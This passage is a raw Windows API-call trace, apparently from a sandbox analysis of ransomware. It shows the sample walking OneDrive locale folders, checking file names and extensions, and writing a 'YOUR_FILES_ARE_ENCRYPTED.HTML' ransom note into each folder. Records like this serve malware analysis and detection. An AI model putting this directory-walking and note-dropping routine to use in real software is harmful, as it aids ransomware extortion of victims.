pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie") returned 77 [0160.531] GetProcessHeap () returned 0x270000 [0160.531] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.531] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie" [0160.531] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\*" [0160.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.532] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.533] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.533] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.533] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.533] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.533] lstrlenW (lpString=".mui") returned 4 [0160.533] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.533] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.533] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.533] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ga-ie\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.534] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.536] CloseHandle (hObject=0x5bc) returned 1 [0160.536] GetProcessHeap () returned 0x270000 [0160.537] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.537] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96c9bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gd", cAlternateFileName="")) returned 1 [0160.537] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd") returned 74 [0160.537] GetProcessHeap () returned 0x270000 [0160.537] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.537] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd" [0160.537] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\*" [0160.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96c9bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.540] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96c9bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.540] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa96c9bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9ce3430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.540] 
wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.540] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.540] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.540] lstrlenW (lpString=".mui") returned 4 [0160.540] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.540] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa96c9bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9ce3430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.540] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.540] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\gd\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.541] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, 
lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.543] CloseHandle (hObject=0x5bc) returned 1 [0160.543] GetProcessHeap () returned 0x270000 [0160.544] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.544] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9ce3430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gd-latn", cAlternateFileName="")) returned 1 [0160.544] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn") returned 79 [0160.544] GetProcessHeap () returned 0x270000 [0160.544] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.544] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn" [0160.544] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\*" [0160.544] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9ce3430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.545] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9ce3430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.545] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.545] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\FileSync.LocalizedResources.dll.mui") returned 115 [0160.545] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0160.545] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.545] lstrlenW (lpString=".mui") returned 4 [0160.546] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.546] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.546] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.546] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0160.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\gd-latn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.546] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.548] CloseHandle (hObject=0x5bc) returned 1 [0160.549] GetProcessHeap () returned 0x270000 [0160.549] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 
1 [0160.549] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gl", cAlternateFileName="")) returned 1 [0160.549] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl") returned 74 [0160.549] GetProcessHeap () returned 0x270000 [0160.549] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.549] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl" [0160.550] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\*" [0160.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.550] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.551] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.551] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.551] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.551] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.551] lstrlenW (lpString=".mui") returned 4 [0160.551] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.551] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.551] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.551] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\gl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.551] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.553] CloseHandle (hObject=0x5bc) returned 1 [0160.554] GetProcessHeap () returned 0x270000 [0160.554] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.554] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gu", cAlternateFileName="")) returned 1 [0160.554] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu") returned 74 [0160.555] GetProcessHeap () returned 0x270000 [0160.555] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.555] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu" [0160.555] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\*" [0160.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.556] FindNextFileW (in: hFindFile=0x42f3280, 